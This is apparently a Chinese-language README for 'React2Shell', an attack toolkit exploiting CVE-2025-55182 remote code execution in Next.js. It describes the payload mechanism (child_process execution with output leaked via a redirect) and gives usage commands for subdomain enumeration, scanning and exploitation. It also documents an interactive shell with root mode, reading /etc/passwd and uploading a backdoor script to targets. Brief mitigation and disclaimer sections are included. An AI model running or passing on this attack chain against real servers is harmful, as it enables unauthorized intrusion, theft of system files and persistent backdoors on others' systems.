opsecramdan/react2shell-cve-2025-55182
GitHub: opsecramdan/react2shell-cve-2025-55182
React2Shell 是一个针对 Next.js 的 CVE-2025-55182 远程代码执行漏洞的利用框架,提供子域名枚举、漏洞扫描与交互式 shell 的一体化攻击链。
Stars: 0 | Forks: 0
# 🚨 React2Shell - CVE-2025-55182 漏洞利用框架




**作者:** opsecramdan
## 📚 目录
- 概述
- 漏洞详情
- 功能
- 环境要求
- 安装说明
- 使用方法
- 交互式 Shell
- 输出文件
- 影响
- 缓解措施
- 限制
- 免责声明
## 📌 概述
React2Shell 是一个漏洞利用框架,旨在识别和利用基于 Next.js 的应用程序中的 **CVE-2025-55182** 漏洞。
该工具被设计为一个 **多合一攻击工具包**,涵盖:
- 子域名枚举
- 漏洞扫描
- 漏洞利用引擎
- 交互式远程 Shell
## 🔍 漏洞详情
- **CVE ID**: CVE-2025-55182
- **类型**: 远程代码执行 (RCE)
- **平台**: Next.js
- **攻击向量**: 恶意的 multipart/form-data 请求
- **影响**: 任意命令执行
### 🧠 根本原因
此漏洞通过以下方式利用 Next.js 的内部机制:
1. 将 payload 注入请求
2. 调用: `process.mainModule.require('child_process')`
3. 执行 OS 命令
4. 将输出进行 Base64 编码
5. 通过重定向 (`/login?a=`) 泄露结果
## ⚙️ 功能
### 🔎 子域名枚举
- DNS + HTTP 扫描
- 内置字典
- 支持自定义字典
- 自动保存结果
### 🧪 漏洞扫描器
- 多 endpoint 测试:
- `/`
- `/api`
- `/api/auth`
- `/_next`
- `/admin`
- `/dashboard`
- Header 与响应分析
- 减少误报
### 💣 漏洞利用引擎
- 自动生成 payload
- Base64 编码执行
- 基于重定向的输出提取
### 🖥️ 交互式 Shell
- 远程命令执行
- 持久化会话
- 目录跟踪
### 📂 文件操作
- 上传文件
- 下载文件
- 创建文件
### 👑 Root 模式
- `sudo -i` 执行
- 权限提升模拟
## 📦 环境要求
- Python 3.x
安装依赖项:
pip install requests dnspython
## 📥 安装说明
### 1. 克隆仓库
git clone https://github.com/yourusername/react2shell-cve-2025-55182.git
### 2. 进入目录
cd react2shell-cve-2025-55182
### 3. 运行工具
python3 react2shell.py
## 🚀 使用方法
### 🎯 单个目标
python3 react2shell.py -u https://target.com
不带 protocol:
python3 react2shell.py -u target.com
### 📄 多个目标
python3 react2shell.py -f targets.txt
targets.txt 内容示例:
https://target1.com
http://target2.com:3000
target3.com
### 🌐 全量模式 (侦察 + 扫描 + 利用)
python3 react2shell.py -d example.com
流程:
1. 子域名枚举
2. 漏洞扫描
3. 漏洞利用 (可选)
### 📚 自定义字典
python3 react2shell.py -d example.com -w wordlist.txt
### 🐞 调试模式
python3 react2shell.py -d example.com --debug
## 🖥️ 交互式 Shell
漏洞利用成功后,你将获得 shell 访问权限。
### 基本命令
whoami
id
uname -a
pwd
ls -lah
### ⚙️ 特殊命令
| 命令 | 描述 |
|----------------|------------|
| .root | 切换 root 模式 |
| .upload | 上传文件到目标 |
| .download | 从目标下载文件 |
| .create | 在目标上创建文件 |
| .save | 将输出保存到本地文件 |
| .exit | 退出 shell |
### 📂 上传文件
.upload shell.php /tmp/shell.php
### 📥 下载文件
.download /etc/passwd
### 📄 创建文件
.create /tmp/test.txt
## 🔄 工作流示例
### 1. 扫描域名
python3 react2shell.py -d example.com
### 2. 识别存在漏洞的目标
### 3. 进入 shell
whoami
### 4. 上传 payload
.upload backdoor.sh /tmp/backdoor.sh
## 📁 输出文件
该工具将生成:
- subdomains_*.txt
- vulnerable_*.txt
- output_*.txt
## ⚠️ 影响
如果成功被利用:
- 远程命令执行
- 访问敏感文件
- 上传 backdoor
- 持久化访问
- 权限提升
## 🛡️ 缓解措施
- 将 Next.js 更新到最新版本
- 限制内部 endpoint
- 严格校验输入
- 使用 WAF (OWASP CRS)
- 监控异常活动
## ⚠️ 免责声明
此工具仅用于:
- 学习
- 研究
- 授权的渗透测试
严禁用于非法活动。
## ⭐ 备注
此项目展示了:
- 高级的漏洞利用技术
- 对 Next.js 内部机制的深入理解
- 真实世界攻击模拟
标签:Next.js, Python, 主机安全, 代码生成, 无后门, 渗透测试工具, 漏洞利用框架, 编程工具, 网络安全审计, 远程代码执行